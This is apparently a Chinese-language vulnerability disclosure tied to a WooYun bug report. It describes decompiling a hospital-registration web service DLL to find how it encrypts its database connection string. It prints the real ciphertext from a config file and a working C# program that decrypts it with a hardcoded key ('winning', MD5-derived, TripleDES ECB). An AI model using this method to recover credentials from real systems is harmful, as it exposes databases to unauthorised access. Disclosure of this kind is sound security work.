FromBase64String

http://www.wooyun.org/bugs/wooyun-2010-0161432

这台服务器的数据库连接字符串加了密

我于是下载了他们的WebService_yygh.dll,然后反编译了一下,找到这个 poc

跟踪getini(),发现这个: poc 再跟踪md5Decrypt这个函数发现这个: poc 然后我在 E:\kingstar\ConnConfig\ConnConfig.ini 发现了这个: 1O1/1Vq/h/0WlMwfuwM+jHw/Fh5rhQQoEr5tZ+tk1OTX7q171c6N6XA0ptSPMUyQ3ywr2i4EJag= 然后我自己写了一个解密的程序:

using System;

using System.Security.Cryptography;

using System.Text;

using System.IO;

public class Test
{

    public static void Main()
    {

        string text = null;

        byte[] buffer = Encoding.Default.GetBytes("winning");

        byte[] array = Convert.FromBase64String("1O1/1Vq/h/0WlMwfuwM+jHw/Fh5rhQQoEr5tZ+tk1OTX7q171c6N6XA0ptSPMUyQ3ywr2i4EJag=");

        MD5CryptoServiceProvider mD5CryptoServiceProvider = new MD5CryptoServiceProvider();

        byte[] key = mD5CryptoServiceProvider.ComputeHash(buffer);

        TripleDESCryptoServiceProvider tripleDESCryptoServiceProvider = new TripleDESCryptoServiceProvider();

        tripleDESCryptoServiceProvider.Key = key;

        tripleDESCryptoServiceProvider.Mode = CipherMode.ECB;

        text = Encoding.ASCII.GetString(tripleDESCryptoServiceProvider.CreateDecryptor().TransformFinalBlock(array, 0, array.Length));

        Console.WriteLine(text);



    }

}

poc

results matching ""

    No results matching ""